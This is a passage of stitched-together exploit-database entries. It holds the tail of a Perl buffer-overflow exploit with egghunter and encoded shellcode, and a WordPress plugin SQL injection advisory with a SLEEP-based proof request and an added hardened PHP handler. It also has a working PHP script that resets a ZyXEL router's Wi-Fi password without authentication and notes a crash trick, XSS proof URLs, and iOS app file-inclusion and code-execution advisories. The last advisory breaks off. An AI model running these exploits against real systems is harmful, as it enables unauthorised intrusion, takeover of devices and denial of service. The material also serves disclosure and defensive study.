#   - once the exploit string is pasted, the egghunter starts to search the memory for the marker
#   - on my test machine the search takes around 30 seconds (until the shellcode gets executed)
#   - during the search the mouse cursor will NOT have an hourglass displayed beside it
#   - during the search the application will NOT become unresponsive (i.e. it will be usable)
##################################################################################################
# Thanks to:
#   - ariarat (PoC)
#   - Peter Van Eeckhoutte (exploit development tutorials)
#   - Offensive Security (IT security courses, admin support)
##################################################################################################

my $junk = "A" x 21;

# Egghunter code; NtAccessCheckAndAuditAlarm method; searches for "0t0t"
# msfencode -e x86/alpha_mixed
# msfencode -e x86/unicode_upper BufferRegister=EAX
# converted to ASCII
my $egghunter = "PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
                "11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
                "B9KHHHYCDO4KD1KB3QIQ9OY190IQ9PIQ9PI0IOS13PCPC1313PCOGB11J2J11R8R" .
                "0P01100OQRK11OQB102Q1OR02PB0BNP0BORQ11228PPP8Q1PBT50JQ9RUOF0M212" .
                "J1Z3IRO3F2O41QB1VP2S20J26RBP3BHRZ2MBVPNRGPLCCOESBCJ2C14482O2O18B" .
                "52000P02EB032PTBNBKR92J0L2OBR1E3ICJPLRO0B0URZ0G2KPO1I2W11Q1AA";

my $fill = "C" x (1045 - length($junk.$egghunter));

my $nextSEH = "\x41\x6d";        # INC ECX; INSW Yz DX
my $SEH = "\x70\x34";            # POP POP RET from gtms_D7.bpl

# jump to egghunter code
my $allign = "\x58";                          # POP EAX
$allign = $allign."\x6d";                     # NOP/remove NULL bytes
$allign = $allign."\x58";                     # POP EAX
$allign = $allign."\x6d";                     # NOP/remove NULL bytes
$allign = $allign."\x58";                     # POP EAX
$allign = $allign."\x6d";                     # NOP/remove NULL bytes
$allign = $allign."\x05\x01\x11";             # ADD EAX, 0x11000100
$allign = $allign."\x6d";                     # NOP/remove NULL bytes
$allign = $allign."\x2d\x09\x11";             # SUB EAX, 0x11000900
$allign = $allign."\x6d";                     # NOP/remove NULL bytes

my $jumptoegghunter = "\x50";                 # PUSH EAX
$jumptoegghunter = $jumptoegghunter."\x6d";   # NOP/remove NULL bytes
$jumptoegghunter = $jumptoegghunter."\xc3";   # RETN

# fill the rest of the stack frame + padding (to avoid a memory area which converts to upper alpha)
my $fill2 = "D" x 500;

# allign EAX and jump to shellcode
# (this gets executed after the marker is found)
my $allign2 = "\x6d";                         # NOP/remove NULL bytes
$allign2 = $allign2."\x57";                   # PUSH EDI
$allign2 = $allign2."\x6d";                   # NOP/remove NULL bytes
$allign2 = $allign2."\x58";                   # POP EAX
$allign2 = $allign2."\x6d";                   # NOP/remove NULL bytes
$allign2 = $allign2."\xb9\x1b\xaa";           # MOV ECX, 0xaa001b00
$allign2 = $allign2."\xe8";                   # ADD AL,CH (equivalent to adding "1b" (from the previous command)
                                              # to the last two bytes of EAX; i.e. increase EAX with "1b")
$allign2 = $allign2."\x6d";                   # NOP/remove NULL bytes
$allign2 = $allign2."\x50";                   # PUSH EAX
$allign2 = $allign2."\x6d";                   # NOP/remove NULL bytes
$allign2 = $allign2."\xc3";                   # RETN

# msfpayload windows/messagebox
# msfencode -e x86/alpha_mixed
# msfencode -e x86/unicode_upper BufferRegister=EAX
# converted to ASCII
my $shellcode = "PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ" .
                "11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944J" .
                "BYKWTHY44MTZTQNPV29190IQ919PI19PIOY19Q3Q3PC13Q3PC13070QPZ2JQ1B8R" .
                "000Q10011RKOQQ10QOBOQ0BOBORQ200Q2Q2Q1Q2QHB0OHQ1Q2CEPJQ91JRY2XBKB" .
                "MPKPI19S3Q4NVQ40J0TBT2QOZRR0N0RPPD70TT1RJC9OEP4PN2KNQQQPD400N2KN" .
                "PSFQ4PLPNBKNT0615PL2NRKRPOV0418PNRKBSPNOW20PL0KBGQ6B51XPRRO2D0X0" .
                "Q35PLP3NS1YB3P11H0Q49BOR92QRQ40RL0KBPRLBD340UD4RNBK010UQW0L2N2KN" .
                "S343F18QBQHBFS1492Z0LPK0PPJB7QXBL0KBR3J2QNP33P1T8RKCJQ3OGPDQ3D9R" .
                "NBKPTSDBL0KBFQQOX2N4621PK0OR0NQD9R02KPL0N0LRKNTPKRP0RB4162G2I21N" .
                "XPO162M03NQ38OWNX2KQ9QTB7PKRSPL1QOD1F0HBQ2E2M01PNRK02CJ0UCDPF1QP" .
                "JPKP5OFBLPK16RLR0PK0N2KQCQZC50L1EPQCHBK0NRK45PTBN2K1CP1QX1XPOD9Q" .
                "ST4PE3DCE0LD3R1NX13NXP2C3NX1G1IBNODRK0948C5POSI2JQRQ5NX0L0NNR2N3" .
                "F2NBJ0LR3BBPK0XBMPO492OCIBO29RO0OSIT7P52D0D0MRKC1RNPJD8PY422C0CB" .
                "OBWSEPLP4341C2BB8QX0N2N0IBOQ92OD9BO2N1YPC45Q7RXNR0HB02L2PBLB1003" .
                "7NQ0148RVPS2F1B342NOC0TPUNXODOE221CNRQ51312PKNXP10LQFOTQ62J0MB92" .
                "MP61606NYBOBSBEBCODPLOYBO02CFNPPMBKPNOX2OQBC2BMPOPL2M0W1W2LNW24S" .
                "112BK1H41T11YBO29BO2KPO130X2PQHNQ00P1P0QGB0NS0XNRCDQEP531BC43OTR" .
                "0P12KRK0NRH410LD4BD45PT0LOY0JPCBBOXC2PNOF0N03BHPW0PR1D82PC1BDP43" .
                "5P9OB0OB508ODP00B0LS2PI030SD508NQSD370PC3PQP040D5P8020OOEOI0B1DN" .
                "PS5NUOHP31ER4OHPB0PT20L031HNS0D13B8BSB5NQ00P1BXQ70P3B0OPPQVBUT0S" .
                "B18OBB4320E012HT4ODPCR8QU40R30SRBPO32PNORQ8P5D0QQQTOENXR2PEPP38B" .
                "R0NPG20D0BIT0BNB5P80B251QS4T02IR0ROP038T30UP2B83CR5R3232B0HP20OR" .
                "3B4P0C5R1NPB1SH0EP5T5P41WR0Q5P3BBQ8P3BW03B1OCQINPRNP4T1SJ2IPO3HT" .
                "22LC724B3CBBN390MNQQ60QT912120J01R013C32CS1QS2B0KPOB8R03DBQ2K2PR" .
                "PPP0KPOBB3E0FQXOQOQAA";

my $payload = $junk.$egghunter.$fill.$nextSEH.$SEH.$allign.$jumptoegghunter.$fill2."0t0t".$allign2.$shellcode;

open(myfile,'>QuickSearch_egghunter_messagebox.txt');
print myfile $payload;
close(myfile);

print "Wrote ".length($payload)." bytes\n";
HireHackking

WordPress Plugin Ultimate Product Catalogue - SQL Injection (1)

# Exploit Title: Unauthenticated SQLi in Item_ID POST parameter on Ultimate Product Catalogue wordpress plugin
# Google Dork: inurl:"SingleProduct" intext:"Back to catalogue" intext:"Category", inurl:"/wp-content/plugins/ultimate-product-catalogue/product-sheets/"
# Date: 22/04/2015
# Exploit Author: Felipe Molina de la Torre (@felmoltor)
# Vendor Homepage: https://wordpress.org/plugins/ultimate-product-catalogue/
# Software Link: https://downloads.wordpress.org/plugin/ultimate-product-catalogue.3.1.2.zip
# Version: < 3.1.2, Communicated and Fixed by the Vendor in 3.1.3
# Tested on: Linux 2.6, PHP 5.3 with magic_quotes_gpc turned off, Apache 2.4.0 (Ubuntu)
# CVE : Requested to mitre but not assigned yet
# Category: webapps

1. Summary:

Ultimate Product Catalogue is a responsive and easily customizable plugin for all your product catalogue needs. It has +59.000 downloads, +3.000 active installations.

Unauthenticated SQL injection in an ajax call when the plugin is counting the times a product is being seen by the web visitors. The vulnerable POST parameter is "Item_ID".

2. Vulnerability timeline:

- 22/04/2015: Identified in version 3.1.2
- 22/04/2015: Communicated to developer company etoilewebdesign.com
- 22/04/2015: Response from etoilewebdesign.com and fixed version in 3.1.3

3. Vulnerable code:

In file Functions/Process_Ajax.php line 67:

[...]
$Item_ID = $_POST['Item_ID'];
$Item = $wpdb->get_row("SELECT Item_Views FROM $items_table_name WHERE Item_ID=" . $Item_ID);
[...]

4. Proof of concept:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: <wordpress host>
[...]
Cookie: wordpress_f305[...]

Item_ID=2 AND SLEEP(5)&action=record_view

5. Solution:

Update to version 3.1.3
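A hardened counterpart to the vulnerable snippet from Functions/Process_Ajax.php, added here as an example. It is not the vendor's 3.1.3 patch (which the advisory does not show): the handler rejects anything that is not a plain integer and then lets `$wpdb->prepare()` bind the id, so a value such as `2 AND SLEEP(5)` never reaches the query text. The function name, the table name and the view-counter UPDATE are assumptions; the `record_view` action and its unauthenticated reachability come from the advisory.

```php
<?php
// Added example: hardened replacement for the vulnerable record_view handler.
// Not the plugin's real code. Assumed: $items_table_name is the plugin's item
// table (constructed here) and the handler is hooked on admin-ajax.php for
// action=record_view, as the advisory's PoC request shows.

function upcp_record_view_hardened() {
    global $wpdb;
    // Assumed table name, built with the site prefix the way most plugins do.
    $items_table_name = $wpdb->prefix . 'UltimateProductCatalog_Items';

    // 1. Validate before the value gets anywhere near SQL. ctype_digit() refuses
    //    "2 AND SLEEP(5)" outright instead of silently truncating it.
    $raw = isset($_POST['Item_ID']) ? wp_unslash($_POST['Item_ID']) : '';
    if (!is_string($raw) || !ctype_digit($raw)) {
        wp_send_json_error(array('message' => 'invalid Item_ID'), 400); // exits
    }
    $item_id = absint($raw);

    // 2. Prepared statement: %d is an integer placeholder, so the id is bound,
    //    never concatenated into the query string as the original code did.
    $item = $wpdb->get_row(
        $wpdb->prepare(
            "SELECT Item_Views FROM {$items_table_name} WHERE Item_ID = %d",
            $item_id
        )
    );
    if ($item === null) {
        wp_send_json_error(array('message' => 'unknown item'), 404); // exits
    }

    // 3. The counter update (assumed behaviour of the endpoint) uses the same
    //    bound id; no string building here either.
    $wpdb->query(
        $wpdb->prepare(
            "UPDATE {$items_table_name} SET Item_Views = Item_Views + 1 WHERE Item_ID = %d",
            $item_id
        )
    );
    wp_send_json_success(array('Item_Views' => (int) $item->Item_Views + 1));
}

// The original endpoint was reachable without a session, so both hooks are
// registered; the nopriv hook is the one an anonymous visitor hits.
add_action('wp_ajax_record_view', 'upcp_record_view_hardened');
add_action('wp_ajax_nopriv_record_view', 'upcp_record_view_hardened');
```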
HireHackking
<?php
/*
Exploit Title : ZYXEL remote configuration editor / Web Server DoS
Date : 23 April 2015
Exploit Author : Koorosh Ghorbani
Site : http://8thbit.net/
Vendor Homepage : http://www.zyxel.com/
Platform : Hardware
Tested On : ZyXEL P-660HN-T1H_IPv6
Firmware Version: 1.02(VLU.0)

--------------------------
Unattended remote access
--------------------------
ZYXEL Embedded Software does not check Cookies and Credentials on the POST method, so attackers could change settings and view pages with the POST method.

--------------------------
DoS Web Server
--------------------------
Sending an empty POST to admin pages will crash the internal web server and the router needs a hard reset.
*/

$banner = " ___ _______ _ ____ _ _______ \r\n" .
          " / _ \__ __| | | _ \(_)__ __|\r\n" .
          " | (_) | | | | |__ | |_) |_ | | \r\n" .
          " > _ < | | | '_ \| _ <| | | | \r\n" .
          " | (_) | | | | | | | |_) | | | | \r\n" .
          " \___/ |_| |_| |_|____/|_| |_| \r\n" .
          " \r\n" .
          " \r\n";
print $banner;

function Post($packet, $host)
{
    try {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_URL, $host);
        curl_setopt($curl, CURLOPT_POST, 1);
        curl_setopt($curl, CURLOPT_POSTFIELDS, $packet);
        curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0");
        // CURLOPT_REFERER takes the bare URL; the original passed "Referer: http://..." as the value
        curl_setopt($curl, CURLOPT_REFERER, "http://192.168.1.1/cgi-bin/WLAN_General.asp");
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } catch (Exception $e) {
        echo $e->getMessage();
        return "";
    }
}

if (sizeof($argv) < 3) {
    print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n";
    exit(1);
}

$host = $argv[1];
$password = urlencode($argv[2]);
$packet = "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0";
$target = "http://$host/cgi-bin/WLAN_General.asp";

if (strlen(Post($packet, $target)) > 0) {
    print "Seems Changed !";
} else {
    print "Humm , No Chance !";
}

//DoS : Post("",$target) ;
?>
HireHackking

JaWiki - 'versionNo' Cross-Site Scripting

source: https://www.securityfocus.com/bid/52060/info

JaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/jawiki/user/main/homepage?action=showVersion&versionNo=%3Cscript%3Ealert%28%22123%20xss%22%29%3C/script%3E
HireHackking
source: https://www.securityfocus.com/bid/52076/info

Endian Firewall is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script on the affected server and steal cookie-based authentication credentials. Other attacks are also possible.

https://www.example.com/cgi-bin/openvpn_users.cgi?=[XSS]
HireHackking

Wifi Drive Pro 1.2 iOS - Local File Inclusion

Document Title:
===============
Wifi Drive Pro v1.2 iOS - File Include Web Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1447

Release Date:
=============
2015-03-13

Vulnerability Laboratory ID (VL-ID):
====================================
1447

Common Vulnerability Scoring System:
====================================
6.3

Product & Service Introduction:
===============================
This app lets you use your iphone, iPad or iPod Touch as a wireless USB drive through which you can download, save and view documents and files. Using the app you can transfer files from your PC or Mac either wirelessly or through a USB port and carry your files wherever you go.

(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/wifi-drive-pro/id579582610 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a file include web vulnerability in the official Wifi Drive Pro v1.2 iOS mobile application.

Vulnerability Disclosure Timeline:
==================================
2015-03-13: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Mindspeak Software
Product: Wifi Drive Pro - iOS Mobile Web Application 1.2

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Mindspeak Software - Wifi Drive Pro v1.2 iOS mobile web-application. The local file include web vulnerability allows remote attackers to include unauthorized local file/path requests or system specific path commands to compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `file upload` module. Remote attackers are able to inject own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application. The local file/path include execution occurs in the index file dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable file upload POST method request. Remote attackers are also able to exploit the filename issue in combination with persistent injected script codes to execute different malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST.

The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application compromise or connected device component compromise.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] File Upload

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index File Dir Listing (http://localhost:49276/)

Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers without privileged application user accounts or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC:
GET http://localhost:49276//%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png

PoC: Vulnerable Source
<p><a href="..">..</a><br>
<a href="68-2.png">68-2.png</a> ( 24.3 Kb, 2015-03-09 14:57:29 +0000)<br>
<a href="/%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"></%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png</a> ( 0.5 Kb, 2015-03-09 14:57:48 +0000)<br />
</p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file<input type="file" name="file" id="file" /></label>
<label><input type="submit" name="button" id="button" value="Submit" /></label></form></body></html></iframe></a></p>

--- PoC Session Logs [POST] (Inject) ---
Status: 200[OK]
POST http://localhost:49276/
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[846] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:49276]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:49276/]
      Connection[keep-alive]
   POST-Daten:
      POST_DATA[-----------------------------28140821932238
Content-Disposition: form-data; name="file"; filename="%3C./[LOCAL FILE INCLUDE VULNERABILITY!]%3E/2.png"
Content-Type: image/png

Reference(s):
http://localhost:49276/
http://localhost:49276//%3C./

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request.
Restrict the filename input and disallow special chars. Ensure that multiple file extensions are not loaded in the filename value to prevent arbitrary file upload attacks.
Encode the output in the file dir index list with the vulnerable name value to prevent application-side injection attacks.

Security Risk:
==============
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.3)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   - www.vuln-lab.com                        - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com - research@vulnerability-lab.com          - admin@evolution-sec.com
Section:    magazine.vulnerability-db.com - vulnerability-lab.com/contact.php     - evolution-sec.com/contact
Social:     twitter.com/#!/vuln_lab     - facebook.com/VulnerabilityLab           - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
HireHackking

Photo Manager Pro 4.4.0 iOS - Local File Inclusion

Document Title:
===============
Photo Manager Pro v4.4.0 iOS - File Include Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1445

Release Date:
=============
2015-03-12

Vulnerability Laboratory ID (VL-ID):
====================================
1445

Common Vulnerability Scoring System:
====================================
6.9

Product & Service Introduction:
===============================
Do you have troubles for managing thousands of photos and videos? Do you have any private photos or videos? Are you looking for a photo portfolio app? Photo Manager Pro is exactly you are looking for. Photo Manager Pro is extremely easy to use. TP Transfer: Transfer folders and files between computer and device over wifi network. HTTP Transfer: Transfer files between computer and device over wifi network. View photos in the browser. Peer to Peer Transfer: Directly transfer files between iPad, iPhone and iPod Touch over wifi network. USB Transfer: Import/Export photos from/to iTunes file sharing. Basic Transfer: Import/Export photos from/to the Photos app.

(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/photo-manager-pro/id393858562 & http://www.linkusnow.com/photomanager/help/ipad/help_main.php )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.

Vulnerability Disclosure Timeline:
==================================
2015-03-12: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Linkus
Product: Photo Manager Pro - iOS Mobile Web Application (Wifi) 4.4.0

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application. The local file include web vulnerability allows remote attackers to include unauthorized local file/path requests or system specific path commands to compromise the mobile web-application.

The web vulnerability is located in the `filename` value of the `upload.action` module. Remote attackers are able to inject own files with malicious `filename` values in the `upload.action` POST method request to compromise the mobile web-application. The local file/path include execution occurs in the index dir listing of the wifi interface. The attacker is able to inject the local file include request by usage of the `wifi interface` in connection with the vulnerable upload service module. Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute unique local malicious attack requests. The attack vector is located on the application-side of the wifi service and the request method to inject is POST. To exploit the bug it is required to use the local device > wifi sync or (remote) the wifi gui.

The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9. Exploitation of the local file include vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the local file include web vulnerability results in mobile application or device compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] upload.action

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] disp_photo.action

Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC:
http://localhost:8080/disp_photo.action?filename=./[LOCAL FILE INCLUDE VULNERABILITY!]2.png

PoC: Vulnerable Source
<div id="photo_content">
<img id="photo" src="disp_photo.action?filename=./[LOCAL FILE INCLUDE VULNERABILITY!]2.png" height="606"></div>

--- Poc Session Logs [POST] (Inject) ---
Status: 200[OK]
POST http://localhost:8080/upload.action?folderID=5
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[31] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Referer[http://localhost:8080/upload.html?folderID=5]
      Cookie[isenabledpasscode=false]
      Connection[keep-alive]
   POST-Daten:
      POST_DATA[-----------------------------15932100885119
Content-Disposition: form-data; name="is_submitted"

false
-----------------------------15932100885119
Content-Disposition: form-data; name="upload_file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]2.png"
Content-Type: image/png

-
Status: 200[OK]
GET http://localhost:8080/upload.html?folderID=5
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[8085] Mime Type[application/x-unknown-content-type]
   Request Header:
      Host[localhost:8080]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
      Accept-Language[de,en-US;q=0.7,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      Cookie[isenabledpasscode=false]
      Connection[keep-alive]
   Response Header:
      Accept-Ranges[bytes]
      Content-Length[8085]
      Date[Do., 05 März 2015 20:52:18 GMT]

Reference(s):
http://localhost:8080/upload.action?folderID=
http://localhost:8080/upload.html?folderID=
http://localhost:8080/disp_photo.action?filename=

Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure validation of the filename value in the upload POST method request.
Restrict the filename input and disallow special chars. Ensure that multiple file extensions are not loaded in the filename value to prevent arbitrary file upload attacks.

Security Risk:
==============
The security risk of the local file include web vulnerability in the photo manager wifi service is estimated as high. (CVSS 6.9)

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
HireHackking

Photo Manager Pro 4.4.0 iOS - Code Execution

Document Title:
===============
Photo Manager Pro 4.4.0 iOS - Code Execution Vulnerability

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1444

Release Date:
=============
2015-03-10

Vulnerability Laboratory ID (VL-ID):
====================================
1444

Common Vulnerability Scoring System:
====================================
8.6

Product & Service Introduction:
===============================
Do you have troubles for managing thousands of photos and videos? Do you have any private photos or videos? Are you looking for a photo portfolio app? Photo Manager Pro is exactly you are looking for. Photo Manager Pro is extremely easy to use. TP Transfer: Transfer folders and files between computer and device over wifi network. HTTP Transfer: Transfer files between computer and device over wifi network. View photos in the browser. Peer to Peer Transfer: Directly transfer files between iPad, iPhone and iPod Touch over wifi network. USB Transfer: Import/Export photos from/to iTunes file sharing. Basic Transfer: Import/Export photos from/to the Photos app.

(Copy of the Vendor Homepage: https://itunes.apple.com/de/app/photo-manager-pro/id393858562 & http://www.linkusnow.com/photomanager/help/ipad/help_main.php )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a code execution vulnerability in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application.

Vulnerability Disclosure Timeline:
==================================
2015-03-10: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Linkus
Product: Photo Manager Pro - iOS Mobile Web Application (Wifi) 4.4.0

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical

Technical Details & Description:
================================
An arbitrary code execution vulnerability has been discovered in the official Linkus Photo Manager Pro v4.4.0 iOS mobile web-application. The vulnerability allows remote attackers to execute malicious codes on the application-side of the vulnerable app to compromise the target mobile device.

The vulnerability is located in the `folderName` value of the `newfolder.action` module. Remote attackers are able to manipulate the `folderName` value in the `index.html#?w=300` file POST method request to compromise the application, user session information or connected device components. The attacker tampers the new Folder POST method request to exchange the regular folderName value with special crafted code. The input context becomes visible at the main index service or subfolder (path). The vector of the vulnerability is located on the application-side.

The security risk of the arbitrary code execution vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6. Exploitation of the arbitrary code execution vulnerability requires no user interaction or privileged web-application user account with password. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects and persistent manipulation function or connected module context.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] newfolder.action

Vulnerable Parameter(s):
[+] folderName

Affected Module(s):
[+] Index (http://localhost:8080)
[+] Sub Category Path

Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

PoC: Create Folder
<div id="main"><div id="breadcrumb">Home</div>
<div id="content"><ul id="folders_ul">
<li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=1"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=1">Family</a></div></li>
<li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=2"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=2">Friends</a></div></li>
<li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=3"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=3">Travel</a></div></li>
<li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=4"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=4">Shopping</a></div></li>
<li><div class="folder_item_bg"><img src="images/blank.gif" class="blank"><a href="browse_folder.html?folderID=5"><img src="images/blank_thumbnail.png" height="86" width="80"></a></div><div class="folder_label"><a href="browse_folder.html?folderID=5">Funny;[CODE EXECUTION VULNERABILITY VIA FOLDERNAME!]></a></div></iframe></a></div></li>
</ul></div>
</div>

... after surfing to the created folder

<div id="wrapper">
<div id="header">
<div id="title">
<h1>Photo Manager Pro</h1>
</div>
</div>
<div id="main">
